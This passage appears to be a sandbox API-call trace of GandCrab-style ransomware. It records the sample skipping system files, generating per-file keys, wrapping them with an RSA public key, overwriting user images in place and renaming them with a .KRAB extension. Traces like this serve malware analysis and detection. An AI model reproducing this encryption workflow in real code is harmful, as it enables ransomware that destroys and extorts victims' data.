lpString2="Bootfont.bin") returned 1 [0097.138] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.138] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1010e80) returned 1 [0097.139] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.139] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.139] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.140] CryptGenRandom (in: hProv=0x1010e80, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0097.140] CryptReleaseContext (hProv=0x1010e80, dwFlags=0x0) returned 1 [0097.140] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.140] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1011458) returned 1 [0097.140] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.141] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.141] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.141] CryptGenRandom (in: hProv=0x1011458, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0097.141] CryptReleaseContext (hProv=0x1011458, dwFlags=0x0) returned 1 [0097.141] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.146] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x10111b0) returned 1 [0097.146] CryptImportKey (in: hProv=0x10111b0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd5a0) returned 1 [0097.146] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0097.146] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0097.147] GetLastError () returned 0x0 [0097.147] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0097.147] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0097.147] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1010df8) returned 1 [0097.147] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd3e0) returned 1 [0097.147] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0097.147] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0097.148] GetLastError () returned 0x0 [0097.148] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0097.148] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0097.148] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\s9qnpo.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\cla7ojk\\s9qnpo.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0097.149] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0097.149] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0097.149] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0x17f23, lpOverlapped=0x0) returned 1 [0097.164] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xfffe80dd, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.164] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x17f23, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0x17f23, lpOverlapped=0x0) returned 1 [0097.164] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0097.164] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.168] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.169] CloseHandle (hObject=0x3a8) returned 1 [0097.169] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.169] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\s9qnpo.gif" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\cla7ojk\\s9qnpo.gif"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\s9qnpo.gif.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\cla7ojk\\s9qnpo.gif.krab")) returned 1 [0097.170] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.170] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0097.170] lstrcmpW (lpString1="UcCOaH2h6zxaMLWc.jpg", lpString2=".") returned 1 [0097.171] lstrcmpW (lpString1="UcCOaH2h6zxaMLWc.jpg", lpString2="..") returned 1 [0097.171] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\", lpString2="UcCOaH2h6zxaMLWc.jpg" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\UcCOaH2h6zxaMLWc.jpg") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\UcCOaH2h6zxaMLWc.jpg" [0097.171] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0097.171] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\UcCOaH2h6zxaMLWc.jpg.KRAB") returned 64 [0097.171] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\UcCOaH2h6zxaMLWc.jpg") returned 59 [0097.171] lstrlenW (lpString=".jpg") returned 4 [0097.171] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.171] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".jpg ") returned 5 [0097.171] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.172] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\UcCOaH2h6zxaMLWc.jpg") returned 59 [0097.172] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\UcCOaH2h6zxaMLWc.jpg") returned 59 [0097.172] lstrcmpiW (lpString1="UcCOaH2h6zxaMLWc.jpg", lpString2="desktop.ini") returned 1 [0097.172] lstrcmpiW (lpString1="UcCOaH2h6zxaMLWc.jpg", lpString2="autorun.inf") returned 1 [0097.172] lstrcmpiW (lpString1="UcCOaH2h6zxaMLWc.jpg", lpString2="ntuser.dat") returned 1 [0097.172] lstrcmpiW (lpString1="UcCOaH2h6zxaMLWc.jpg", lpString2="iconcache.db") returned 1 [0097.172] lstrcmpiW (lpString1="UcCOaH2h6zxaMLWc.jpg", lpString2="bootsect.bak") returned 1 [0097.172] lstrcmpiW (lpString1="UcCOaH2h6zxaMLWc.jpg", lpString2="boot.ini") returned 1 [0097.172] lstrcmpiW (lpString1="UcCOaH2h6zxaMLWc.jpg", lpString2="ntuser.dat.log") returned 1 [0097.172] lstrcmpiW (lpString1="UcCOaH2h6zxaMLWc.jpg", lpString2="thumbs.db") returned 1 [0097.172] lstrcmpiW (lpString1="UcCOaH2h6zxaMLWc.jpg", lpString2="KRAB-DECRYPT.html") returned 1 [0097.172] lstrcmpiW (lpString1="UcCOaH2h6zxaMLWc.jpg", lpString2="KRAB-DECRYPT.txt") returned 1 [0097.172] lstrcmpiW (lpString1="UcCOaH2h6zxaMLWc.jpg", lpString2="CRAB-DECRYPT.txt") returned 1 [0097.172] lstrcmpiW (lpString1="UcCOaH2h6zxaMLWc.jpg", lpString2="ntldr") returned 1 [0097.172] lstrcmpiW (lpString1="UcCOaH2h6zxaMLWc.jpg", lpString2="NTDETECT.COM") returned 1 [0097.172] lstrcmpiW (lpString1="UcCOaH2h6zxaMLWc.jpg", lpString2="Bootfont.bin") returned 1 [0097.275] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.276] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x10111b0) returned 1 [0097.276] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.277] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.277] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.277] CryptGenRandom (in: hProv=0x10111b0, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0097.277] CryptReleaseContext (hProv=0x10111b0, dwFlags=0x0) returned 1 [0097.277] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.277] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1011678) returned 1 [0097.278] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.278] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.278] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.278] CryptGenRandom (in: hProv=0x1011678, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0097.278] CryptReleaseContext (hProv=0x1011678, dwFlags=0x0) returned 1 [0097.279] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.279] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1010df8) returned 1 [0097.279] CryptImportKey (in: hProv=0x1010df8, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd3e0) returned 1 [0097.279] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0097.279] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0097.280] GetLastError () returned 0x0 [0097.280] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0097.280] CryptReleaseContext (hProv=0x1010df8, dwFlags=0x0) returned 1 [0097.280] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1011898) returned 1 [0097.280] CryptImportKey (in: hProv=0x1011898, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd3e0) returned 1 [0097.280] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0097.280] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0097.281] GetLastError () returned 0x0 [0097.281] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0097.281] CryptReleaseContext (hProv=0x1011898, dwFlags=0x0) returned 1 [0097.281] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\UcCOaH2h6zxaMLWc.jpg" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\cla7ojk\\uccoah2h6zxamlwc.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0097.281] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0097.282] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0097.283] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0x132a2, lpOverlapped=0x0) returned 1 [0097.296] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xfffecd5e, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.297] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x132a2, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0x132a2, lpOverlapped=0x0) returned 1 [0097.297] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0097.297] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.301] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.302] CloseHandle (hObject=0x3a8) returned 1 [0097.302] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.302] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\UcCOaH2h6zxaMLWc.jpg" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\cla7ojk\\uccoah2h6zxamlwc.jpg"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\UcCOaH2h6zxaMLWc.jpg.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\cla7ojk\\uccoah2h6zxamlwc.jpg.krab")) returned 1 [0097.303] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.303] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 1 [0097.303] lstrcmpW (lpString1="XoJNBNfrrrF4m.png", lpString2=".") returned 1 [0097.303] lstrcmpW (lpString1="XoJNBNfrrrF4m.png", lpString2="..") returned 1 [0097.303] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\", lpString2="XoJNBNfrrrF4m.png" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\XoJNBNfrrrF4m.png") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\XoJNBNfrrrF4m.png" [0097.303] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0097.304] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\XoJNBNfrrrF4m.png.KRAB") returned 61 [0097.304] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\XoJNBNfrrrF4m.png") returned 56 [0097.304] lstrlenW (lpString=".png") returned 4 [0097.304] VirtualAlloc (lpAddress=0x0, dwSize=0xc, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.304] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".png ") returned 5 [0097.304] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.304] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\XoJNBNfrrrF4m.png") returned 56 [0097.304] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\XoJNBNfrrrF4m.png") returned 56 [0097.305] lstrcmpiW (lpString1="XoJNBNfrrrF4m.png", lpString2="desktop.ini") returned 1 [0097.305] lstrcmpiW (lpString1="XoJNBNfrrrF4m.png", lpString2="autorun.inf") returned 1 [0097.305] lstrcmpiW (lpString1="XoJNBNfrrrF4m.png", lpString2="ntuser.dat") returned 1 [0097.305] lstrcmpiW (lpString1="XoJNBNfrrrF4m.png", lpString2="iconcache.db") returned 1 [0097.305] lstrcmpiW (lpString1="XoJNBNfrrrF4m.png", lpString2="bootsect.bak") returned 1 [0097.305] lstrcmpiW (lpString1="XoJNBNfrrrF4m.png", lpString2="boot.ini") returned 1 [0097.305] lstrcmpiW (lpString1="XoJNBNfrrrF4m.png", lpString2="ntuser.dat.log") returned 1 [0097.305] lstrcmpiW (lpString1="XoJNBNfrrrF4m.png", lpString2="thumbs.db") returned 1 [0097.305] lstrcmpiW (lpString1="XoJNBNfrrrF4m.png", lpString2="KRAB-DECRYPT.html") returned 1 [0097.305] lstrcmpiW (lpString1="XoJNBNfrrrF4m.png", lpString2="KRAB-DECRYPT.txt") returned 1 [0097.305] lstrcmpiW (lpString1="XoJNBNfrrrF4m.png", lpString2="CRAB-DECRYPT.txt") returned 1 [0097.305] lstrcmpiW (lpString1="XoJNBNfrrrF4m.png", lpString2="ntldr") returned 1 [0097.305] lstrcmpiW (lpString1="XoJNBNfrrrF4m.png", lpString2="NTDETECT.COM") returned 1 [0097.305] lstrcmpiW (lpString1="XoJNBNfrrrF4m.png", lpString2="Bootfont.bin") returned 1 [0097.305] VirtualAlloc (lpAddress=0x0, dwSize=0x208, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.305] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x10112c0) returned 1 [0097.306] VirtualAlloc (lpAddress=0x0, dwSize=0x21, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.306] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.307] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.307] CryptGenRandom (in: hProv=0x10112c0, dwLen=0x20, pbBuffer=0x338ef4c | out: pbBuffer=0x338ef4c) returned 1 [0097.307] CryptReleaseContext (hProv=0x10112c0, dwFlags=0x0) returned 1 [0097.307] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.307] CryptAcquireContextW (in: phProv=0x338eeb4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeb4*=0x1010f08) returned 1 [0097.307] VirtualAlloc (lpAddress=0x0, dwSize=0x9, flAllocationType=0x3000, flProtect=0x40) returned 0x3030000 [0097.308] GetModuleHandleA (lpModuleName="Advapi32.dll") returned 0x77990000 [0097.308] GetProcAddress (hModule=0x77990000, lpProcName="CryptGenRandom") returned 0x779b0df0 [0097.308] CryptGenRandom (in: hProv=0x1010f08, dwLen=0x8, pbBuffer=0x338ef6c | out: pbBuffer=0x338ef6c) returned 1 [0097.308] CryptReleaseContext (hProv=0x1010f08, dwFlags=0x0) returned 1 [0097.308] VirtualFree (lpAddress=0x3030000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.309] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x10114e0) returned 1 [0097.309] CryptImportKey (in: hProv=0x10114e0, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd5a0) returned 1 [0097.309] CryptGetKeyParam (in: hKey=0xfbd5a0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0097.309] CryptEncrypt (in: hKey=0xfbd5a0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50000*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50000*, pdwDataLen=0x338eedc*=0x100) returned 1 [0097.309] GetLastError () returned 0x0 [0097.310] CryptDestroyKey (hKey=0xfbd5a0) returned 1 [0097.310] CryptReleaseContext (hProv=0x10114e0, dwFlags=0x0) returned 1 [0097.310] CryptAcquireContextW (in: phProv=0x338eeac, szContainer=0x0, szProvider="Microsoft Enhanced Cryptographic Provider v1.0", dwProvType=0x1, dwFlags=0xf0000000 | out: phProv=0x338eeac*=0x1011018) returned 1 [0097.310] CryptImportKey (in: hProv=0x1011018, pbData=0x2e90000, dwDataLen=0x114, hPubKey=0x0, dwFlags=0x0, phKey=0x338eeb0 | out: phKey=0x338eeb0*=0xfbd3e0) returned 1 [0097.310] CryptGetKeyParam (in: hKey=0xfbd3e0, dwParam=0x8, pbData=0x338eea4, pdwDataLen=0x338eea8, dwFlags=0x0 | out: pbData=0x338eea4*=0x800, pdwDataLen=0x338eea8*=0x4) returned 1 [0097.310] CryptEncrypt (in: hKey=0xfbd3e0, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x2f50100*, pdwDataLen=0x338eedc*=0xc8, dwBufLen=0x100 | out: pbData=0x2f50100*, pdwDataLen=0x338eedc*=0x100) returned 1 [0097.311] GetLastError () returned 0x0 [0097.311] CryptDestroyKey (hKey=0xfbd3e0) returned 1 [0097.311] CryptReleaseContext (hProv=0x1011018, dwFlags=0x0) returned 1 [0097.311] CreateFileW (lpFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\XoJNBNfrrrF4m.png" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\cla7ojk\\xojnbnfrrrf4m.png"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0x3a8 [0097.311] VirtualAlloc (lpAddress=0x0, dwSize=0x100001, flAllocationType=0x3000, flProtect=0x4) returned 0x3870000 [0097.311] VirtualAlloc (lpAddress=0x0, dwSize=0x100005, flAllocationType=0x3000, flProtect=0x4) returned 0x3b80000 [0097.312] ReadFile (in: hFile=0x3a8, lpBuffer=0x3870000, nNumberOfBytesToRead=0x100000, lpNumberOfBytesRead=0x338ef7c, lpOverlapped=0x0 | out: lpBuffer=0x3870000*, lpNumberOfBytesRead=0x338ef7c*=0x16f1, lpOverlapped=0x0) returned 1 [0097.324] SetFilePointerEx (in: hFile=0x3a8, liDistanceToMove=0xffffe90f, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0097.324] WriteFile (in: hFile=0x3a8, lpBuffer=0x3b80000*, nNumberOfBytesToWrite=0x16f1, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x3b80000*, lpNumberOfBytesWritten=0x338ef78*=0x16f1, lpOverlapped=0x0) returned 1 [0097.324] WriteFile (in: hFile=0x3a8, lpBuffer=0x2f50000*, nNumberOfBytesToWrite=0x208, lpNumberOfBytesWritten=0x338ef78, lpOverlapped=0x0 | out: lpBuffer=0x2f50000*, lpNumberOfBytesWritten=0x338ef78*=0x208, lpOverlapped=0x0) returned 1 [0097.325] VirtualFree (lpAddress=0x3870000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.328] VirtualFree (lpAddress=0x3b80000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.329] CloseHandle (hObject=0x3a8) returned 1 [0097.329] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.330] MoveFileW (lpExistingFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\XoJNBNfrrrF4m.png" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\cla7ojk\\xojnbnfrrrf4m.png"), lpNewFileName="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\cLa7oJk\\XoJNBNfrrrF4m.png.KRAB" (normalized: "c:\\users\\ciihmnxmn6ps\\pictures\\cla7ojk\\xojnbnfrrrf4m.png.krab")) returned 1 [0097.330] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.331] FindNextFileW (in: hFindFile=0xfbd7a0, lpFindFileData=0x338efd0 | out: lpFindFileData=0x338efd0) returned 0 [0097.331] FindClose (in: hFindFile=0xfbd7a0 | out: hFindFile=0xfbd7a0) returned 1 [0097.331] CloseHandle (hObject=0x434) returned 1 [0097.331] FindNextFileW (in: hFindFile=0xfbd920, lpFindFileData=0x338f250 | out: lpFindFileData=0x338f250) returned 1 [0097.331] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2=".") returned 1 [0097.331] lstrcmpW (lpString1="d2ca4a08d2ca4dee3d.lock", lpString2="..") returned 1 [0097.331] lstrcatW (in: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\", lpString2="d2ca4a08d2ca4dee3d.lock" | out: lpString1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\d2ca4a08d2ca4dee3d.lock") returned="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\d2ca4a08d2ca4dee3d.lock" [0097.331] VirtualAlloc (lpAddress=0x0, dwSize=0x200, flAllocationType=0x3000, flProtect=0x4) returned 0x2f30000 [0097.331] wsprintfW (in: param_1=0x2f30000, param_2="%s.KRAB" | out: param_1="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\d2ca4a08d2ca4dee3d.lock.KRAB") returned 59 [0097.332] lstrlenW (lpString="C:\\Users\\CIiHmnxMn6Ps\\Pictures\\d2ca4a08d2ca4dee3d.lock") returned 54 [0097.332] lstrlenW (lpString=".lock") returned 5 [0097.332] VirtualAlloc (lpAddress=0x0, dwSize=0xe, flAllocationType=0x3000, flProtect=0x4) returned 0x2f50000 [0097.332] wsprintfW (in: param_1=0x2f50000, param_2="%s " | out: param_1=".lock ") returned 6 [0097.332] VirtualFree (lpAddress=0x2f50000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.332] VirtualFree (lpAddress=0x2f30000, dwSize=0x0, dwFreeType=0x8000) returned 1 [0097.333] 